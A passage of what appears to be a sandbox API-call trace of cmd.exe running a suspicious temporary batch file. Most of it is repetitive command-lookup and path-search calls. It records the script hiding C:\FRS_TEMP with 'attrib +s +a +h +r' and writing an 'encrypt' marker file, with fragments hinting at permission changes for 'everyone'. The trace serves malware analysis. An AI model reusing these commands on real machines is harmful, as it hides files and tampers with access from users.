_String2="MD") returned -12 [0037.022] _wcsicmp (_String1="attrib", _String2="MKDIR") returned -12 [0037.022] _wcsicmp (_String1="attrib", _String2="RD") returned -17 [0037.022] _wcsicmp (_String1="attrib", _String2="RMDIR") returned -17 [0037.022] _wcsicmp (_String1="attrib", _String2="PATH") returned -15 [0037.022] _wcsicmp (_String1="attrib", _String2="GOTO") returned -6 [0037.022] _wcsicmp (_String1="attrib", _String2="SHIFT") returned -18 [0037.022] _wcsicmp (_String1="attrib", _String2="CLS") returned -2 [0037.022] _wcsicmp (_String1="attrib", _String2="CALL") returned -2 [0037.022] _wcsicmp (_String1="attrib", _String2="VERIFY") returned -21 [0037.022] _wcsicmp (_String1="attrib", _String2="VER") returned -21 [0037.022] _wcsicmp (_String1="attrib", _String2="VOL") returned -21 [0037.022] _wcsicmp (_String1="attrib", _String2="EXIT") returned -4 [0037.022] _wcsicmp (_String1="attrib", _String2="SETLOCAL") returned -18 [0037.022] _wcsicmp (_String1="attrib", _String2="ENDLOCAL") returned -4 [0037.022] _wcsicmp (_String1="attrib", _String2="TITLE") returned -19 [0037.022] _wcsicmp (_String1="attrib", _String2="START") returned -18 [0037.022] _wcsicmp (_String1="attrib", _String2="DPATH") returned -3 [0037.022] _wcsicmp (_String1="attrib", _String2="KEYS") returned -10 [0037.023] _wcsicmp (_String1="attrib", _String2="MOVE") returned -12 [0037.023] _wcsicmp (_String1="attrib", _String2="PUSHD") returned -15 [0037.023] _wcsicmp (_String1="attrib", _String2="POPD") returned -15 [0037.023] _wcsicmp (_String1="attrib", _String2="ASSOC") returned 1 [0037.023] _wcsicmp (_String1="attrib", _String2="FTYPE") returned -5 [0037.023] _wcsicmp (_String1="attrib", _String2="BREAK") returned -1 [0037.023] _wcsicmp (_String1="attrib", _String2="COLOR") returned -2 [0037.023] _wcsicmp (_String1="attrib", _String2="MKLINK") returned -12 [0037.023] _wcsnicmp (_String1="attr", _String2="cmd ", _MaxCount=0x4) returned -2 [0037.023] SetErrorMode (uMode=0x0) returned 0x0 [0037.023] SetErrorMode (uMode=0x1) returned 0x0 [0037.023] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd1bb18, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0037.023] SetErrorMode (uMode=0x0) returned 0x1 [0037.023] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0037.023] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0037.023] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0037.023] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.023] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0037.023] GetLastError () returned 0x2 [0037.023] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.023] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd27150 [0037.024] FindClose (in: hFindFile=0xd27150 | out: hFindFile=0xd27150) returned 1 [0037.024] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0037.024] GetLastError () returned 0x2 [0037.024] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd27150 [0037.024] FindClose (in: hFindFile=0xd27150 | out: hFindFile=0xd27150) returned 1 [0037.024] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0037.024] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0037.024] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0037.024] _wcsicmp (_String1="attrib", _String2="DIR") returned -3 [0037.024] _wcsicmp (_String1="attrib", _String2="ERASE") returned -4 [0037.024] _wcsicmp (_String1="attrib", _String2="DEL") returned -3 [0037.024] _wcsicmp (_String1="attrib", _String2="TYPE") returned -19 [0037.024] _wcsicmp (_String1="attrib", _String2="COPY") returned -2 [0037.024] _wcsicmp (_String1="attrib", _String2="CD") returned -2 [0037.024] _wcsicmp (_String1="attrib", _String2="CHDIR") returned -2 [0037.024] _wcsicmp (_String1="attrib", _String2="RENAME") returned -17 [0037.024] _wcsicmp (_String1="attrib", _String2="REN") returned -17 [0037.025] _wcsicmp (_String1="attrib", _String2="ECHO") returned -4 [0037.025] _wcsicmp (_String1="attrib", _String2="SET") returned -18 [0037.025] _wcsicmp (_String1="attrib", _String2="PAUSE") returned -15 [0037.025] _wcsicmp (_String1="attrib", _String2="DATE") returned -3 [0037.025] _wcsicmp (_String1="attrib", _String2="TIME") returned -19 [0037.025] _wcsicmp (_String1="attrib", _String2="PROMPT") returned -15 [0037.025] _wcsicmp (_String1="attrib", _String2="MD") returned -12 [0037.025] _wcsicmp (_String1="attrib", _String2="MKDIR") returned -12 [0037.025] _wcsicmp (_String1="attrib", _String2="RD") returned -17 [0037.025] _wcsicmp (_String1="attrib", _String2="RMDIR") returned -17 [0037.025] _wcsicmp (_String1="attrib", _String2="PATH") returned -15 [0037.025] _wcsicmp (_String1="attrib", _String2="GOTO") returned -6 [0037.025] _wcsicmp (_String1="attrib", _String2="SHIFT") returned -18 [0037.025] _wcsicmp (_String1="attrib", _String2="CLS") returned -2 [0037.025] _wcsicmp (_String1="attrib", _String2="CALL") returned -2 [0037.025] _wcsicmp (_String1="attrib", _String2="VERIFY") returned -21 [0037.025] _wcsicmp (_String1="attrib", _String2="VER") returned -21 [0037.025] _wcsicmp (_String1="attrib", _String2="VOL") returned -21 [0037.025] _wcsicmp (_String1="attrib", _String2="EXIT") returned -4 [0037.025] _wcsicmp (_String1="attrib", _String2="SETLOCAL") returned -18 [0037.025] _wcsicmp (_String1="attrib", _String2="ENDLOCAL") returned -4 [0037.025] _wcsicmp (_String1="attrib", _String2="TITLE") returned -19 [0037.025] _wcsicmp (_String1="attrib", _String2="START") returned -18 [0037.025] _wcsicmp (_String1="attrib", _String2="DPATH") returned -3 [0037.025] _wcsicmp (_String1="attrib", _String2="KEYS") returned -10 [0037.025] _wcsicmp (_String1="attrib", _String2="MOVE") returned -12 [0037.025] _wcsicmp (_String1="attrib", _String2="PUSHD") returned -15 [0037.025] _wcsicmp (_String1="attrib", _String2="POPD") returned -15 [0037.025] _wcsicmp (_String1="attrib", _String2="ASSOC") returned 1 [0037.025] _wcsicmp (_String1="attrib", _String2="FTYPE") returned -5 [0037.025] _wcsicmp (_String1="attrib", _String2="BREAK") returned -1 [0037.025] _wcsicmp (_String1="attrib", _String2="COLOR") returned -2 [0037.025] _wcsicmp (_String1="attrib", _String2="MKLINK") returned -12 [0037.025] _wcsicmp (_String1="attrib", _String2="DIR") returned -3 [0037.025] _wcsicmp (_String1="attrib", _String2="ERASE") returned -4 [0037.025] _wcsicmp (_String1="attrib", _String2="DEL") returned -3 [0037.025] _wcsicmp (_String1="attrib", _String2="TYPE") returned -19 [0037.025] _wcsicmp (_String1="attrib", _String2="COPY") returned -2 [0037.025] _wcsicmp (_String1="attrib", _String2="CD") returned -2 [0037.025] _wcsicmp (_String1="attrib", _String2="CHDIR") returned -2 [0037.026] _wcsicmp (_String1="attrib", _String2="RENAME") returned -17 [0037.026] _wcsicmp (_String1="attrib", _String2="REN") returned -17 [0037.026] _wcsicmp (_String1="attrib", _String2="ECHO") returned -4 [0037.026] _wcsicmp (_String1="attrib", _String2="SET") returned -18 [0037.026] _wcsicmp (_String1="attrib", _String2="PAUSE") returned -15 [0037.026] _wcsicmp (_String1="attrib", _String2="DATE") returned -3 [0037.026] _wcsicmp (_String1="attrib", _String2="TIME") returned -19 [0037.026] _wcsicmp (_String1="attrib", _String2="PROMPT") returned -15 [0037.026] _wcsicmp (_String1="attrib", _String2="MD") returned -12 [0037.026] _wcsicmp (_String1="attrib", _String2="MKDIR") returned -12 [0037.026] _wcsicmp (_String1="attrib", _String2="RD") returned -17 [0037.026] _wcsicmp (_String1="attrib", _String2="RMDIR") returned -17 [0037.026] _wcsicmp (_String1="attrib", _String2="PATH") returned -15 [0037.026] _wcsicmp (_String1="attrib", _String2="GOTO") returned -6 [0037.026] _wcsicmp (_String1="attrib", _String2="SHIFT") returned -18 [0037.026] _wcsicmp (_String1="attrib", _String2="CLS") returned -2 [0037.026] _wcsicmp (_String1="attrib", _String2="CALL") returned -2 [0037.026] _wcsicmp (_String1="attrib", _String2="VERIFY") returned -21 [0037.026] _wcsicmp (_String1="attrib", _String2="VER") returned -21 [0037.026] _wcsicmp (_String1="attrib", _String2="VOL") returned -21 [0037.026] _wcsicmp (_String1="attrib", _String2="EXIT") returned -4 [0037.026] _wcsicmp (_String1="attrib", _String2="SETLOCAL") returned -18 [0037.026] _wcsicmp (_String1="attrib", _String2="ENDLOCAL") returned -4 [0037.026] _wcsicmp (_String1="attrib", _String2="TITLE") returned -19 [0037.026] _wcsicmp (_String1="attrib", _String2="START") returned -18 [0037.026] _wcsicmp (_String1="attrib", _String2="DPATH") returned -3 [0037.026] _wcsicmp (_String1="attrib", _String2="KEYS") returned -10 [0037.026] _wcsicmp (_String1="attrib", _String2="MOVE") returned -12 [0037.026] _wcsicmp (_String1="attrib", _String2="PUSHD") returned -15 [0037.026] _wcsicmp (_String1="attrib", _String2="POPD") returned -15 [0037.026] _wcsicmp (_String1="attrib", _String2="ASSOC") returned 1 [0037.026] _wcsicmp (_String1="attrib", _String2="FTYPE") returned -5 [0037.026] _wcsicmp (_String1="attrib", _String2="BREAK") returned -1 [0037.026] _wcsicmp (_String1="attrib", _String2="COLOR") returned -2 [0037.026] _wcsicmp (_String1="attrib", _String2="MKLINK") returned -12 [0037.026] _wcsicmp (_String1="attrib", _String2="FOR") returned -5 [0037.026] _wcsicmp (_String1="attrib", _String2="IF") returned -8 [0037.026] _wcsicmp (_String1="attrib", _String2="REM") returned -17 [0037.026] _wcsnicmp (_String1="attr", _String2="cmd ", _MaxCount=0x4) returned -2 [0037.027] SetErrorMode (uMode=0x0) returned 0x0 [0037.027] SetErrorMode (uMode=0x1) returned 0x0 [0037.027] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd2c500, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0037.027] SetErrorMode (uMode=0x0) returned 0x1 [0037.027] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0037.027] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0037.027] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0037.027] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.027] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0037.027] GetLastError () returned 0x2 [0037.027] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.027] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd271a0 [0037.027] FindClose (in: hFindFile=0xd271a0 | out: hFindFile=0xd271a0) returned 1 [0037.027] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0037.027] GetLastError () returned 0x2 [0037.027] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd271a0 [0037.028] FindClose (in: hFindFile=0xd271a0 | out: hFindFile=0xd271a0) returned 1 [0037.028] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0037.028] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0037.028] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0037.028] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0037.028] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0037.028] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0037.028] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.028] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.028] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.028] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.028] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0037.028] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.028] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.028] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.028] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.028] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.028] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.028] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.028] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.028] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.028] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.029] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.029] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0037.029] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +s +a +h +r C:\\FRS_TEMP", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +s +a +h +r C:\\FRS_TEMP", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="attrib +s +a +h +r C:\\FRS_TEMP", lpProcessInformation=0xc8ea3c*(hProcess=0x80, hThread=0x8c, dwProcessId=0x728, dwThreadId=0xbf4)) returned 1 [0037.033] CloseHandle (hObject=0x8c) returned 1 [0037.033] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0037.033] GetEnvironmentStringsW () returned 0xd174a8* [0037.033] FreeEnvironmentStringsA (penv="=") returned 1 [0037.033] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) returned 0x0 [0037.066] GetExitCodeProcess (in: hProcess=0x80, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0037.066] CloseHandle (hObject=0x80) returned 1 [0037.067] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0037.067] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0037.067] GetEnvironmentStringsW () returned 0xd174a8* [0037.067] FreeEnvironmentStringsA (penv="=") returned 1 [0037.067] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0037.067] GetEnvironmentStringsW () returned 0xd174a8* [0037.067] FreeEnvironmentStringsA (penv="=") returned 1 [0037.067] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0037.067] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.067] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0037.067] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.067] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0037.068] _get_osfhandle (_FileHandle=0) returned 0x24 [0037.068] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0037.068] SetConsoleInputExeNameW () returned 0x1 [0037.068] GetConsoleOutputCP () returned 0x1b5 [0037.068] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0037.068] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.068] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0037.068] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0037.069] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.069] SetFilePointer (in: hFile=0x80, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0037.069] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0037.069] ReadFile (in: hFile=0x80, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x4db, lpOverlapped=0x0) returned 1 [0037.069] SetFilePointer (in: hFile=0x80, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0037.069] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n\n /d everyone\r\nd everyone\r\n\n\r\n=%%i\r\n") returned 35 [0037.069] GetFileType (hFile=0x80) returned 0x1 [0037.069] _get_osfhandle (_FileHandle=3) returned 0x80 [0037.069] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0037.069] _wcsicmp (_String1="echo.encrypt", _String2=")") returned 60 [0037.069] _wcsicmp (_String1="FOR", _String2="echo.encrypt") returned 1 [0037.069] _wcsicmp (_String1="FOR/?", _String2="echo.encrypt") returned 1 [0037.069] _wcsicmp (_String1="IF", _String2="echo.encrypt") returned 4 [0037.069] _wcsicmp (_String1="IF/?", _String2="echo.encrypt") returned 4 [0037.069] _wcsicmp (_String1="REM", _String2="echo.encrypt") returned 13 [0037.069] _wcsicmp (_String1="REM/?", _String2="echo.encrypt") returned 13 [0037.069] _tell (_FileHandle=3) returned 1462 [0037.069] _close (_FileHandle=3) returned 0 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="DIR") returned 1 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="ERASE") returned -15 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="DEL") returned 1 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="TYPE") returned -15 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="COPY") returned 2 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="CD") returned 2 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="CHDIR") returned 2 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="RENAME") returned -13 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="REN") returned -13 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="ECHO") returned 46 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="SET") returned -14 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="PAUSE") returned -11 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="DATE") returned 1 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="TIME") returned -15 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="PROMPT") returned -11 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="MD") returned -8 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="MKDIR") returned -8 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="RD") returned -13 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="RMDIR") returned -13 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="PATH") returned -11 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="GOTO") returned -2 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="SHIFT") returned -14 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="CLS") returned 2 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="CALL") returned 2 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="VERIFY") returned -17 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="VER") returned -17 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="VOL") returned -17 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="EXIT") returned -21 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="SETLOCAL") returned -14 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="ENDLOCAL") returned -11 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="TITLE") returned -15 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="START") returned -14 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="DPATH") returned 1 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="KEYS") returned -6 [0037.070] _wcsicmp (_String1="echo.encrypt", _String2="MOVE") returned -8 [0037.071] _wcsicmp (_String1="echo.encrypt", _String2="PUSHD") returned -11 [0037.071] _wcsicmp (_String1="echo.encrypt", _String2="POPD") returned -11 [0037.071] _wcsicmp (_String1="echo.encrypt", _String2="ASSOC") returned 4 [0037.071] _wcsicmp (_String1="echo.encrypt", _String2="FTYPE") returned -1 [0037.071] _wcsicmp (_String1="echo.encrypt", _String2="BREAK") returned 3 [0037.071] _wcsicmp (_String1="echo.encrypt", _String2="COLOR") returned 2 [0037.071] _wcsicmp (_String1="echo.encrypt", _String2="MKLINK") returned -8 [0037.071] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0037.071] SetErrorMode (uMode=0x0) returned 0x0 [0037.071] SetErrorMode (uMode=0x1) returned 0x0 [0037.071] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd1bb18, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0037.071] SetErrorMode (uMode=0x0) returned 0x1 [0037.071] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0037.071] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0037.071] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0037.071] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.071] FindFirstFileExW (in: 